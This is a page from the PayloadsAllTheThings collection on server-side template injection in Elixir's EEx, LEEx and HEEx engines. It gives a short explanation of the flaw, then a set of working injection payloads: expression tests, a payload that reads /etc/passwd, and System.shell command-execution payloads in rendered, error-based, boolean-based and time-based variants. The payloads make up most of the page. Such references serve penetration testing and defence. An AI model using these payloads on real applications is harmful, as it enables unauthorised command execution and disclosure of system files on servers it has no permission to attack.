elixir.md (2601B)
1 --- 2 title: "Server Side Template Injection - Elixir" 3 topic: "Server Side Template Injection" 4 topicSlug: "server-side-template-injection" 5 sourcePath: "Server Side Template Injection/Elixir.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Server%20Side%20Template%20Injection/Elixir.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # Server Side Template Injection - Elixir 12 13 > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation. 14 15 ## Summary 16 17 - [Templating Libraries](#templating-libraries) 18 - [Universal Payloads](#universal-payloads) 19 - [EEx](#eex) 20 - [EEx - Basic injections](#eex---basic-injections) 21 - [EEx - Retrieve /etc/passwd](#eex---retrieve-etcpasswd) 22 - [EEx - Remote Command execution](#eex---remote-command-execution) 23 - [References](#references) 24 25 ## Templating Libraries 26 27 | Template Name | Payload Format | 28 |---------------|----------------| 29 | EEx | `<%= %>` | 30 | LEEx | `<%= %>` | 31 | HEEx | `<%= %>` | 32 33 ## Universal Payloads 34 35 Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx. 36 37 By default, only EEx can render templates from string, but it is possible to use LEEx and HEEx as replacement engines for EEx. 38 39 To use these payloads, wrap them in the appropriate tag. 40 41 ```erlang 42 elem(System.shell("id"), 0) # Rendered RCE 43 [1, 2][elem(System.shell("id"), 0)] # Error-Based RCE 44 1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE 45 elem(System.shell("id && sleep 5"), 0) # Time-Based RCE 46 ``` 47 48 ## EEx 49 50 [Official website](https://hexdocs.pm/eex/1.19.5/EEx.html) 51 > EEx stands for Embedded Elixir. 52 53 ### EEx - Basic injections 54 55 ```erlang 56 <%= 7 * 7 %> 57 ``` 58 59 ### EEx - Retrieve /etc/passwd 60 61 ```erlang 62 <%= File.read!("/etc/passwd") %> 63 ``` 64 65 ### EEx - Remote Command execution 66 67 ```erlang 68 <%= elem(System.shell("id"), 0) %> # Rendered RCE 69 <%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE 70 <%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE 71 <%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE 72 ``` 73 74 ## References 75 76 - [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)